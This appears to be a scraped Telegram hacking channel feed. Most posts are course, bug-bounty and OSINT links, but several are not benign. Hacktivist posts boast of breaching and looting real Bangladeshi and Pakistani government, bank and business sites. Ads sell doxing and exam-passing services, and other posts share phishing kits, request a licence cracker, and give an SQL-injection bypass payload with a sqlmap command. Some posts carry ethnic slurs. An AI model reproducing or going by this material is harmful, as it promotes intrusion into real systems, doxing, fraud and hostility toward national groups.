Crackcodes

Posts

Date Content Media
2024-04-18 14:46:39
None
2024-04-18 12:25:30
None
2024-04-18 02:09:41
None
2024-04-17 17:24:50
The Wednesday Updates #3(2024) is out now.https://osintambition.substack.com/p/the-wednesday-updates-658Don't forget to subscribe.#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate #infosec
2024-04-17 14:36:28
None
2024-04-17 05:33:49
𝗢𝗦 𝗖𝗼𝗺𝗺𝗮𝗻𝗱 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗶𝗻 𝗚𝗶𝘁𝗹𝗮𝗯😱They have just ran a Gitlab Runner and passed out the OS Command which has executed Windows Calculator, in Windows OS Image. 𝘽𝙤𝙪𝙣𝙩𝙮 : 6500$𝗟𝗶𝗻𝗸: https://youtu.be/cDp-BTdhH0k?si=kLIoy_SKRL2T9MrS
2024-04-17 01:29:41
None
2024-04-17 01:28:59
CrackCodes 🇮🇳 pinned a photo
2024-04-17 00:31:39
आनृशंस्यमनुक्रोशः श्रुतं शीलं दमः शमः।राघवं शोभयन्त्येते षड्गुणाः पुरुषोत्तमम्॥राम नवमी की हार्दिक शुभकामनाये ❤️🙏🏻जय श्री राम🙏🏻 Images
2024-04-16 14:39:32
https://youtu.be/TpS4kQsiWhY?si=Ne5rF02F3lX1OzX3
2024-04-16 14:36:54
None
2024-04-16 01:45:15
None
2024-04-15 17:08:33
None
2024-04-15 09:24:52
None
2024-04-15 04:54:47
𝗭𝗲𝗿𝗼-𝗗𝗮𝘆 𝗥𝗖𝗘 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆😲𝗣𝗿𝗼𝗱𝘂𝗰𝘁: Palo Alto Global Protect𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟯𝟰𝟬𝟬𝗟𝗶𝗻𝗸: https://youtube.com/shorts/H6Lskmn8ywU?si=CntyK-0hGQBWlgnU
2024-04-15 03:05:50
None
2024-04-14 16:05:19
None
2024-04-13 14:29:56
## Test For SQL Injection[ ] Test SQL Injection on authentication forms[ ] Test SQL Injection on the search bar[ ] Test SQL Injection on editable characteristics[ ] Try to find SQL keywords or entry point detections[ ] Try to inject SQL queries[ ] Use tools like SQLmap or Hackbar[ ] Use Google dorks to find the SQL keywords[ ] Try GET based SQL Injection[ ] Try POST based SQL Injection[ ] Try COOKIE based SQL Injection[ ] Try HEADER based SQL Injection[ ] Try SQL Injection with null bytes before the SQL query[ ] Try SQL Injection with URL encoding[ ] Try SQL Injection with both lower and upper cases[ ] Try SQL Injection with SQL Tamper scripts[ ] Try SQL Injection with SQL Time delay payloads[ ] Try SQL Injection with SQL Conditional delays[ ] Try SQL Injection with Boolean based SQL[ ] Try SQL Injection with Time based SQLFollow on Twitter(X) : twitter.com/SH3lLH4CK3RJoin Telegram : t.me/Sh3llh4ck3r_Se…Subscribe YouTube : youtube.com/@newbiehackersFollow on Instagram : instagram.com/sh3llh4ck3r#bugbounty #ethicalhacking #hackforgood #infosec #cybersec #cybersecurity #informationsecurity#smartcontract #blockchain #hacking #Web3Community #web3security #bugbounty #bugbountytips #sqlinjection#Ethereum #howtohack #hackerone #immunefy #opensource #bugcrowd #solidity #programming
2024-04-13 13:58:09
None
2024-04-13 01:57:38
None
2024-04-13 01:53:01
None
2024-04-12 13:30:20
None
2024-04-12 12:15:21
19-year-old Naama Levy was born in Israel & raised in India.On 7th October, she was abducted by Hamas terrorists.#bringthemhomenow We Stand with Israel 🇮🇳🤝🇮🇱 #KINGSMAN_INDIA
2024-04-12 04:59:56
🚀Artificial intelligence complete course 🚀https://mega.nz/folder/rWBmwKAB#jz9Hd18LLI9b8QyLHSC-AQ
2024-04-12 03:36:41
None
2024-04-12 03:28:11
None
2024-04-11 11:32:36
None
2024-04-11 10:07:56
None
2024-04-11 03:13:40
None
2024-04-10 18:18:38
The Wednesday Updates #2(2024), our new weekly series for delivering all updates from OSINT community. Including the current affairs, Educational blogs and videos worth watching and Event updates.https://osintambition.substack.com/p/the-wednesday-updates-556Don't forget to subscribe to the newsletter.Join @osintambition for more. Images
2024-04-10 14:10:28
https://t.me/team_4_bit
2024-04-10 12:03:16
None
2024-04-10 04:38:02
None
2024-04-10 02:15:02
None
2024-04-09 16:18:10
None
2024-04-09 11:31:24
None
2024-04-09 05:43:27
None
2024-04-09 02:27:48
Why photo geolocating is one of the most important OSINT skills by @cybdetective https://publication.osintambition.org/why-photo-geolocating-is-one-of-the-most-important-osint-skills-88a98f741d74 Join @osintambition for more.#osint #geolocation #geoint #cybersec #infosec #investigations
2024-04-09 00:52:39
शुभ चैत्र नवरात्रि 🙏 Images
2024-04-08 14:27:29
None
2024-04-08 09:24:05
😎😎
2024-04-08 05:25:36
𝗦𝘁𝗼𝗿𝗲𝗱 𝗫𝗦𝗦 𝗶𝗻 𝗦𝘁𝗮𝗿𝗯𝘂𝗰𝗸𝘀🤩In this Video, the researcher has show how to find and Exploit it from Basic instead of giving XSS Prompt🤓✨𝗕𝗼𝘂𝗻𝘁𝘆: 𝟱𝟬𝟬$𝗖𝗵𝗲𝗰𝗸 𝗛𝗮𝗰𝗸𝗲𝗿𝗼𝗻𝗲 𝗥𝗲𝗽𝗼𝗿𝘁 𝗶𝗻 𝗱𝗲𝘀𝗰𝗿𝗶𝗽𝘁𝗶𝗼𝗻𝗟𝗶𝗻𝗸: https://youtu.be/6p9kjfEIcbI?si=78TANUBV60BVwRdA𝙋𝙡𝙚𝙖𝙨𝙚 𝙡𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏🏻🙃
2024-04-08 02:31:50
None
2024-04-07 09:41:53
None
2024-04-07 08:49:06
None
2024-04-07 08:38:10
None
2024-04-05 14:39:19
None
2024-04-05 02:07:11
https://t.me/+sstpPwUFotE2ZDE1
2024-04-04 05:54:53
https://system32.in/topic/phishing-tool-links/
2024-04-04 04:55:40
📚 Exciting Update! Starting now, this channel will exclusively focus on providing APTITUDE, GATE, CUET, NEET, JEE, and other competitive exam courses. All related resources will be shared here. For coding resources, please refer to our group dedicated to coding. Let's streamline our content for enhanced learning experiences! 🚀 Join us for comprehensive exam prep! 📝GROUP LINK : https://t.me/+FpZeWKSalzgzY2Y1 ~ Hacklock
2024-04-04 02:47:02
None
2024-04-03 16:02:20
None
2024-04-03 13:44:12
Introducing, The Wednesday Updates, our new weekly series for delivering all updates from OSINT community. osintambition.substack.com/p/the-wednesday-updatesDon't forget to subscribe to the newsletter.Join @osintambition for more. Images
2024-04-02 15:27:21
https://youtu.be/p4V-4N1oSaA
2024-04-02 15:17:30
https://twitter.com/arifaajakia/status/1774999713650999396Porkistaniyo Ki Aukat *Kharid liya isko bhi hamne
2024-04-01 05:29:52
👇🏻𝗔𝗰𝗰𝗲𝘀𝘀 𝗖𝗼𝗻𝘁𝗿𝗼𝗹 𝗜𝘀𝘀𝘂𝗲 👇🏻𝗟𝗶𝗻𝗸: https://youtube.com/shorts/KWVxhMhNZ_I?si=z2JR_pXqXkK1-CqM
2024-03-31 14:48:30
None
2024-03-31 09:56:23
None
2024-03-31 01:03:31
Install now: https://play.google.com/store/apps/details?id=com.hack.shelfShare And Support Images
2024-03-30 00:47:19
None Images
2024-03-29 14:17:32
None Images
2024-03-29 05:19:28
𝗧𝗨𝗥𝗡 𝗦𝗲𝗿𝘃𝗲𝗿 𝗮𝗹𝗹𝗼𝘄𝘀 𝗧𝗖𝗣 & 𝗨𝗗𝗣 𝗽𝗿𝗼𝘅𝗶𝗻𝗴 - 𝗦𝗦𝗥𝗙 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆😍𝗕𝗼𝘂𝗻𝘁𝘆: $𝟯,𝟱𝟬𝟬 🔥𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/0bAYQmMIsTo?si=B5PAmjJvtY3PvBCB𝙃𝙖𝙘𝙠𝙚𝙧𝙤𝙣𝙚 𝙍𝙚𝙥𝙤𝙧𝙩 𝙞𝙨 𝙖𝙙𝙙𝙚𝙙 𝙞𝙣 𝘿𝙚𝙨𝙘𝙧𝙞𝙥𝙩𝙞𝙤𝙣 & 𝙢𝙖𝙠𝙚 𝙨𝙪𝙧𝙚 𝙮𝙤𝙪 𝙇𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏🏻
2024-03-29 01:37:23
None
2024-03-28 12:18:39
🔰Bnagladeash scouts Has Been Hacked By Team-NETWORK-Nine🔰🔰As expected from the weak country the data is nil🔰✅ Site scouts.gov.bd☢️ Threat Actor solveig⚠️ Stay Away From Indian Cyber Space ⚠️☢️Greetz to#Team NWH SECURITY #Demonsec#Team D4RK PREDAT0RZ#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team ucc#Team BlackDragonsec#indiancybermafia#anonsec #cryptojackers india#Hacktivist of vanguardCOUNTER CYBER ATTACK Jai Shree Ram ❤️ Images Images Images Images Images
2024-03-28 02:26:00
ChiasmodonCommand line #osint toolkit for domain information gathering. Search by:- domain name- Google Play Store ID- CIDR/ASN- email/username/passwordPartly free.https://github.com/chiasmod0n/chiasmodonCreator twitter.com/chiasmod0n#python Images
2024-03-27 05:34:43
𝗣𝗮𝘁𝗵 𝗧𝗿𝗮𝘃𝗲𝗿𝘀𝗮𝗹 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗦𝘂𝗺𝗺𝗮𝗿𝘆👇🏻😍👇🏻𝗟𝗶𝗻𝗸 : https://youtube.com/shorts/_z844fd8F2Q?si=IdzlxiPcxSGQkhAo
2024-03-25 03:52:52
Have a memorable day with friends and family. Happy Holi.🥳🥳💦💕💦🙌 Images
2024-03-25 01:01:34
None
2024-03-24 03:24:38
🔰Board of Intermediate & Secondary Education, Comilla Has Been Hacked By Team-NETWORK-Nine 🔰✅🇧🇩 Site :-https://web.comillaboard.gov.bd/bisecb☢️ Threat Actor solveig⚠️ Stay Away From Indian Cyber Space ⚠️☢️Greetz to#Team NWH SECURITY #Demonsec#Team D4RK PREDAT0RZ#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team ucc#Team BlackDragonsec#indiancybermafia#anonsec #cryptojackers india#Hacktivist of vanguardCOUNTER CYBER ATTACK Jai Shree Ram ❤️ Images Images Images Images
2024-03-23 04:28:10
There has been an attack at the Moscow Crocus City Mall. We pray for the families who are suffering in this attack. ISIS has claimed responsibility for this attack. In this time, we stand with Russia 🇷🇺. Our intel team will work on identifying ISIS members and report their findings.#UnitedAgainstTerror#IndianCyberForce 🇮🇳
2024-03-20 06:35:54
Is Tor really safe? Vulnerabilities in Torhttps://techofide.com/blogs/vulnerabilities-in-tor-is-the-tor-browser-safe/Show your support by like and comment on our articles.Join our group for exclusive content t.me/ethicalhackingtechofide Images
2024-03-20 05:18:19
𝙊𝙫𝙚𝙧𝙫𝙞𝙚𝙬 𝙤𝙛 𝙒𝙚𝙗 𝙇𝙇𝙈 𝘼𝙩𝙩𝙖𝙘𝙠 👇🏻🤖𝙇𝙞𝙣𝙠: https://youtube.com/shorts/niLSFLVXGlo?si=_2CrgNiW1ebd24Z1
2024-03-18 10:57:37
Twitter Security Self-Audit Guide https://securityalliance.notion.site/Twitter-Security-Self-Audit-8fdb80d93a144dbab0f0cc4ff59c2131Join @osintambition for more.
2024-03-18 06:20:26
𝗔𝘂𝘁𝗼𝗺𝗮𝘁𝗶𝗻𝗴 𝗫𝗦𝗦 𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗢𝗻𝗲 𝗟𝗶𝗻𝗲𝗿 𝗦𝗰𝗿𝗶𝗽𝘁 - 𝗖𝘆𝗯𝗲𝗿𝗫𝗦😍✨𝗟𝗶𝗻𝗸: https://youtu.be/p4V-4N1oSaA?si=tSBhZ3ijzChRd0wP𝗟𝗶𝗸𝗲 & 𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲 𝘁𝗼 𝗼𝘂𝗿 𝗬𝗼𝘂𝗧𝘂𝗯𝗲 𝗰𝗵𝗮𝗻𝗻𝗲𝗹😄
2024-03-18 00:47:59
Your New Admins: @Cyberdin1 @Blackeye @oxzeroxl @Sickjones @techofide @ashell_is_BacK @hacklathon @shivaya_dav @Dheerajydv19 @PRO_MCRACKERMai Ja Raha hu
2024-03-18 00:39:11
Install now: https://play.google.com/store/apps/details?id=com.hack.shelfShare And Support Images
2024-03-16 14:47:32
File to URL Bot Use It If You Want To Post A File Here:https://t.me/System32Download_bot
2024-03-16 13:50:21
i AM Leaving Telegram And Other Social Media Platforms If SomeOne Have Some Free Time To Manage My Channel And Websites Please Dm Me @Mynk0x00
2024-03-15 14:07:58
Please Share Guys ,We Can Beat Meta(Facebook,Instagram) Soon😂If You Share I Will Give You Special Post In My Future Company 😂Chalo Bhaiyyo Share Kardo In Your Channels,Groups And With Your Friends.Thank you ❤️ In Advance Link : https://system32.in Images
2024-03-15 10:40:00
None
2024-03-15 10:30:59
None
2024-03-15 04:03:24
🚀RECON FOR ETHICAL HACKING AND BUG BOUNTY 🚀https://mega.nz/folder/UewD3SpA#9wrVrLz-DEUS9MDRvr96jQ Images
2024-03-15 00:53:25
https://t.me/study_linksBhoiya iska peromotion kr doge plzz
2024-03-14 18:30:23
Join our group also to get exclusive content on cybersecurity t.me/ethicalhackingtechofide
2024-03-14 18:29:40
Hello everyone we have started the Ethical Hacking course for those who want to start there career in ethical Hacking and cybersecurity.We are contributing to our society with free education so they can also grow.Weekly two videos will be released on Techofide youtube channel and I will also share here.This is the Fourth videoEthical Hacking Course part 4 Download & Install virtual environment VMwarehttps://youtu.be/_wHyEBlv0vg?si=tzG-eXI1zbdC0W53I hope you love this video and support us.Join our group at t.me/ethicalhackingtechofide for more exclusive content Part 1: An Introduction to Ethical Hacking https://youtu.be/PZWgfqQNwJwPart 2: Basic terms used in Cybersecurity https://youtu.be/y__Gr3U5g4o?si=jTncrMO50L_abL4xPart 3: Lab setup terms https://youtu.be/_wHyEBlv0vg?si=tzG-eXI1zbdC0W53Part 4: Virtue environment download & Install https://youtu.be/e73YuBq8amI?si=df2qpGW0ASq5BSPZ
2024-03-14 13:53:06
None
2024-03-14 10:27:34
None
2024-03-14 07:03:43
None
2024-03-14 04:57:29
None
2024-03-14 04:30:09
None
2024-03-14 03:38:23
Mad Max Fury - India Edition 🥶🤤Indian Army Latest Modern Cavalry demonstration in Pokhran firing Range at Western Border during Bharat Shakti 2024.TATA QRFV 🇮🇳TATA IPMV 🇮🇳Mahindra Marksman 🇮🇳Kalyani M4 🇮🇳Beautiful sight 😍
2024-03-13 11:47:12
None
2024-03-13 07:42:25
We are back with another blog from the series of Dark web operations This blog will tell you how .onion addresses are actually generated? How does it workhttps://techofide.com/blogs/how-are-tor-onion-hidden-addresses-created-how-does-it-work/Please read this and support by like share and comment.Join our group for such exclusive content.t.me/ethicalhackingtechofideHappy learning hackers Images
2024-03-13 01:04:33
https://system32.in/post/53_osint-toolkit-https-github-com-dev-lu-osint-toolkit-git.html
2024-03-12 14:49:04
Visit: system32.in Images
2024-03-12 11:14:02
None
2024-03-12 09:03:41
None
2024-03-11 16:27:11
https://t.me/+F9wgrOymXL41OTVl
2024-03-11 12:19:54
None
2024-03-11 09:00:35
None
2024-03-11 08:42:01
https://system32.in/post/32_https-crackcodes-in-puter-desktop-environment-in-the-browser.htmlPuter - Desktop Environment In The Browser Images
2024-03-10 04:19:13
PRACTICAL PHISHING 🔗https://mega.nz/folder/5g92yJoD#27k3xn8gwV4wrx4gzJoHSg Images
2024-03-10 01:34:50
None
2024-03-09 08:29:01
@BVSHAI
2024-03-08 12:09:47
Social Site Only for Techies And Hackies For Sharing Knowledge,Expirence And Moments To Digital WorldFeatures: *Posts*Chat*Story*Buy And Sell Market place*Groups*Pages*Fourms*JobsAnd Many More Site: https://system32.inJoin And Share With your techie Friends
2024-03-08 09:54:45
https://system32.in/post/16_cve-2024-25830-and-cve-2024-25832-datacube3-improper-access-control-and-unrestri.html
2024-03-08 04:17:23
🔗 FULL COURSE ETHICAL HACKING 🔗https://mega.nz/folder/6MQnRTAC#ATTM1NKgj5ZpM5Is8vpyXQ/folder/XApk2CjR
2024-03-08 04:16:17
None
2024-03-08 03:55:48
Hello everyone we have started the Ethical Hacking course for those who want to start there career in ethical Hacking and cybersecurity.We are contributing to our society with free education so they can also grow.Weekly two videos will be released on Techofide youtube channel and I will also share here.This is the Third videoEthical Hacking Course part 3 Basic Knowledge of Lab setup https://youtu.be/_wHyEBlv0vg?si=tzG-eXI1zbdC0W53I hope you love this video and support us.Join our group at t.me/ethicalhackingtechofide for more exclusive content Part 1: An Introduction to Ethical Hacking https://youtu.be/PZWgfqQNwJwPart 2: Basic terms used in Cybersecurity https://youtu.be/y__Gr3U5g4o?si=jTncrMO50L_abL4xPart 3: Lab setup terms https://youtu.be/_wHyEBlv0vg?si=tzG-eXI1zbdC0W53
2024-03-08 03:05:41
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-03-08 01:09:28
महाशिवरात्रि की शुभकामनाएं 🙏हर हर महादेव 🙏 Images
2024-03-06 16:47:04
https://t.me/ethicalhackersmarley
2024-03-06 09:39:43
None
2024-03-06 09:23:27
None
2024-03-06 09:09:30
None
2024-03-05 01:36:03
None
2024-03-04 13:37:29
The God Geeks is the community is related to Cybersecurity. Join the community if u want. This community is only for educational purposes only.WARNING :- Geeks AheadLink :- https://t.me/+JzUtM7rnrpBmMWVlRegards,VIP (@FUCK1NG_BR4ND)
2024-03-04 03:52:48
None
2024-03-02 07:31:43
Hello everyone we have started the Ethical Hacking course for those who want to start there career in ethical Hacking and cybersecurity.We are contributing to our society with free education so they can also grow.Weekly two videos will be released on Techofide youtube channel and I will also share here.This is the second videoEthical Hacking Course part 2 Basic Terminologies used in Cybersecurity https://youtu.be/y__Gr3U5g4o?si=jTncrMO50L_abL4xI hope you love this video and support us.Join our group for exclusive content: t.me/ethicalhackingtechofide
2024-03-02 04:04:48
None
2024-03-02 01:38:44
None
2024-03-01 04:47:54
Hi Everyone! I am back with another article of dark web operations series.This blog will tell you how Tor network works and everything that you should know about tor network https://techofide.com/blogs/what-is-tor-how-does-it-work-everything-about-tor-network/I request you all to support us by like and comment on our blogs.My mission is to contribute learnings of cybersecurity from experiences for beginners Join our group for such exclusive content: t.me/ethicalhackingtechofide Images
2024-03-01 01:37:08
None
2024-02-29 14:52:03
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-02-29 11:47:13
We are deleting all videos from our YT channel.https://youtube.com/@OSINTAMBITIONAll the videos will be either delete or will be made private on 7march and will stat private afterwards.If anyone wants to watch or save them, download them and store them in your device or any cloud.Why? We decided to restart our YT channel with a new motivation and will proceed in a particular direction while staying focused on one particular topic at a time. We will also be staying regular and punctual for uploading our videos at regular intervals of time. Stay tuned, a lot of new things will be coming now. Join @osintambition .
2024-02-28 01:54:20
None
2024-02-27 09:04:18
None Images
2024-02-27 06:56:20
🌟HighRank DA65 | PA43bard.alquds.edu💰Price:400$https://prnt.sc/41f0aRRIcui-
2024-02-27 00:32:02
-bdanonymousadmin-anonsec_bangladesh-T_GRAY_HACKERThese groups Kids Gallery Images They Already Know These Beauties 😂😂😂By Anonymous Person✦ @ANONYMOUS_INDIA_101 ✦
2024-02-27 00:32:01
bdanonymousadminanonsec_bangladeshT_GRAY_HACKERThese groups Kids Gallery Images They Already Know These Beauties 😂😂😂By Anonymous Person✦ @ANONYMOUS_INDIA_101 ✦ Images Images Images Images Images Images Images Images Images Images
2024-02-26 05:10:33
None
2024-02-25 12:32:39
🟢 ALL EXAMS VOUCHERS AVAILABLE ( PAID ) [ CEH , OSCP , ALL INE , EJPT ETC ] 35% OFF ON ORIGINAL PRICE🟢 TRYHACKME PREMIUM AVAILABLE ( 400/month )DM @CYBERDIN IF YOU NEED 💎TRUSTED🎙 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠 🔠🔤🔠🔠
2024-02-25 02:01:55
1️⃣1st App Closed Testing Joining Link : https://play.google.com/apps/testing/com.mynk.quiz 2️⃣2nd App Internal Testing Link : https://play.google.com/apps/internaltest/4701312551803095089 Thanks For Joining 🙏🏻 Send Me Your PlayStore Mail And Join (30…
2024-02-25 01:36:39
None
2024-02-25 00:29:40
Central Depository of Bangladesh has been hacked by TEAM-NETWORK-NINEsite☠️ https://www.cdbl.com.bd/type☠️ DataThreat Actor ghostGreetz to#Team NWH SECURITY #Demonsec#Team D4RK PREDAT0RZ#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team ucc#Team BlackDragonsec#indiancybermafia#anonsec #cryptojackers india#Hacktivist of vanguardCOUNTER CYBER ATTACK Images Images Images Images Images
2024-02-24 11:35:18
The Vacation international Consultancy firm of Bangladeash has been hacked by TEAM-NETWORK-NINEsite☠️ https://vacationclubint.com/type☠️ Data names,emails,phonenumbers Threat Actor ghost ☠️ solveigGreetz to#Team NWH SECURITY #Demonsec#Team D4RK PREDAT0RZ#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team ucc#Team BlackDragonsec#indiancybermafia#anonsec #cryptojackers india#Hacktivist of vanguardCOUNTER CYBER ATTACK Images Images Images Images Images Images Images Images Images
2024-02-24 02:06:35
CrackCodes 🇮🇳 pinned «1️⃣1st App Closed Testing Joining Link : https://play.google.com/apps/testing/com.mynk.quiz 2️⃣2nd App Internal Testing Link : https://play.google.com/apps/internaltest/4701312551803095089 Thanks For Joining 🙏🏻 Send Me Your PlayStore Mail And Join (30…»
2024-02-24 02:06:21
None
2024-02-24 01:53:36
None
2024-02-24 01:43:27
1️⃣1st App Closed Testing Joining Link : https://play.google.com/apps/testing/com.mynk.quiz2️⃣2nd App Internal Testing Link : https://play.google.com/apps/internaltest/4701312551803095089Thanks For Joining 🙏🏻Send Me Your PlayStore Mail And Join (30 Testers Currently)
2024-02-23 11:51:17
I want 20 testers To Test Our App In Closed Testing On Playstore for production ReleasePlease Send Your Emails To My DM @mynk0x00 To Add You Into Testing TeamThank you 🙏🏻
2024-02-23 07:05:02
🟢 ALL EXAMS VOUCHERS AVAILABLE ( PAID ) [ CEH , OSCP , ALL INE , EJPT ETC ] 🟢 EXAMS PASSING SERVICES ( PAID ) DM @CYBERDIN IF YOU NEED 💎TRUSTED🎙 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠 🔠🔤🔠🔠
2024-02-22 12:36:34
None
2024-02-22 10:03:38
Anyone php script licence cracker or bypasser Plz dm @mynk0x00Aapki ati kripa hogi ji 🙏
2024-02-21 18:15:33
Hello everyone we have started the Ethical Hacking course for those who want to start there career in ethical Hacking and cybersecurity.We are contributing to our society with free education so they can also grow.Weekly two videos will be released on Techofide youtube channel and I will also share here.This is the first videoEthical Hacking Course part 1 An Introduction to Ethical Hacking https://youtu.be/PZWgfqQNwJwI hope you love this video and support us. If you like please drop a comment subscribe and hit like 👍 Thank you
2024-02-21 12:18:03
None
2024-02-21 11:30:50
Indus Appstore#india_ka_appstore Images
2024-02-21 01:54:20
8OP5AuWjYomSkL0irWbFfKO9t43m9WYdWDKJPb2Ap6W+0OLlf80h/xQc/FHVEqAb
2024-02-20 19:01:32
Our next post from Dark Web Operations seriesHow to Access Dark Web with Top 10 best dark web Links is livehttps://techofide.com/blogs/how-to-access-dark-web-use-dark-web-links-safely/Read and support with a like and comment on a blog if you like the blogMore is coming....Join our group as well for more exclusive content t.me/ethicalhackingtechofide Images
2024-02-19 06:52:03
None
2024-02-19 03:31:15
None
2024-02-19 01:20:38
आपत्सु रामः समरेषु भीमः दानेषु कर्णः नयेषु कृष्णः। Images
2024-02-18 08:14:01
https://play.google.com/store/apps/details?id=in.cdac.ners.psa.mobile.android.national112 IndiaResponse Within 4-5 minutes Images Images
2024-02-16 13:13:58
None
2024-02-16 10:37:02
pakistan biggest cafe owned by Team-Network-NineThreat Actor p10neGreetz to#Demonsec#Team D4RK PREDAT0RZ#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team ucc#Team BlackDragonsec#indiancybermafia#anonsec #cryptojackers india#Hacktivist of vanguardCOUNTER CYBER ATTACK Images Images
2024-02-16 04:48:37
1st Hindu Temple Abu Dhabi, UAE Images
2024-02-16 02:45:30
None
2024-02-16 02:10:56
None
2024-02-15 12:45:08
thm supplier hai koi idhr ? 200 300 wale dm me mat ana 😂 @cyberdin kro dm
2024-02-15 11:12:37
🟢 HACKTHEBOX ( HTB ) PREMIUM AVAILABLE ( PAID ) 🟢 DOXING SERVICE AVAILABLE ( PAID )DM @CYBERDIN IF YOU NEED✅ TRUSTED 🌐100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠 🔠🔤🔠🔠
2024-02-15 10:38:37
Let's learn how to setup OWASP ZAP in your browser for vulnerability scans.https://techofide.com/blogs/setting-up-owasp-zap-as-a-proxy-for-your-browser-and-performing-a-vulnerability-scan/You can join our group as well for exclusive cybersecurity content t.me/ethicalhackingtechofideWe have many blogs for beginners to Advance Images
2024-02-15 00:12:29
10+ Pakistani Websites Has Been Hacked By Indian Cyber Force! Sites:->>https://pakbanks.pk/https://11thclassresult.pkhttp://dashboard.pakbanks.pkhttp://online.hamzzzinterior.com/http://miuc.com.pk/http://info.pakbanks.pkhttp://docs.pakbanks.pkhttp://products.hamzzzinterior.comhttps://armanapparels.comhttps://countrygroup.com.pkhttp://e-nikahservice.comhttps://hamzzzinterior.comhttps://molekulzinternational.comhttps://watermatsports.comhttp://pakbanks.com.pk/https://attarigadgets.pk/icf/https://clickmag.pk/icf/Mirror:->>https://mirror-h.org/search/hacker/66613/https://ownzyou.com/zone/204686#IndianCyberForce#BlackDayForIndia#IndianArmyZindabad
2024-02-15 00:11:21
Drobed by TEAM-NETWORK-NINEsite☠️www.sfgroup.com.bd Type Data size 1.11 GBThreat Actor : SOLVEIGGreetz to#Team NWH SECURITY #Demonsec#Team D4RK PREDAT0RZ#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team ucc#Team BlackDragonsec#indiancybermafia#anonsec COUNTER CYBER ATTACK Images
2024-02-14 10:00:17
🔰 Tenants Registration System Of Islamabad Police Has Been Hacked By Team UCC 🔰✅ Here Is The Sample :- Click Here#14_February#AnonymousIndia #UnknownCyberCult #Indian_Cyber_Punk #TeamNwh #All_Indian_Hackers #Network_Nine #Black_Dragon_Sec #DarkCyberWarrior #Demon_Sec #GlorySec⚜️♤ @UCC_TEAM ♤⚜️ Images
2024-02-14 10:00:05
Jinnah Law College PeshawarHacked By F0RB1DDEN_GH057https://jinnahcollege.edu.pk/14/02/2019/site: https://jinnahcollege.edu.pkmirror: https://mirror-h.org/zone/5587929/Team Dark Predat0rzGreetz to:D4RK_ADAMM4D_GH057F0RB1DDEN-GH05TBL4CK_J0KERS0LVEIGBU7CHERM4R5H4LLD0M1N1CW!7CHER
2024-02-14 09:59:32
HBL Pakistan Top #1 Bank employee Portal database has been Hacked🔥 .#IndianCyberForce 🇮🇳
2024-02-14 06:16:51
Excited to learn for Dark Web but never get to know where to start?I got you covered.  Read this to start learning from dark web operations series.Launches first official article from the Dark Web Operations series https://techofide.com/blogs/what-is-the-dark-web-is-dark-web-illegal-an-introduction/More is coming...Post a review if you like Images
2024-02-14 02:01:00
None
2024-02-13 23:59:08
पुलवामा शहीदों को शत-शत नमन! 🫡❤️जय हिंद 🇮🇳#blackday 14 feb. 2019Never Forgive, Never Forget Images
2024-02-13 03:35:25
🟢 HACKTHEBOX ( HTB ) PREMIUM AVAILABLE ( PAID ) 🟢 DOXING SERVICE AVAILABLE ( PAID )DM @CYBERDIN IF YOU NEED✅ TRUSTED 🌐100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠 🔠🔤🔠🔠
2024-02-13 00:56:49
Bypassing SQL*payload:8%20or%207250%3d0725*для sqlmap:sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast*#sql #bypass
2024-02-11 15:28:51
1.4 lakh mobile numbers, 50,000 IMEI and 2000-plus URLs and approx 20000 entities sending malicious SMS are blacklisted by Government (DoT) Images
2024-02-11 11:40:03
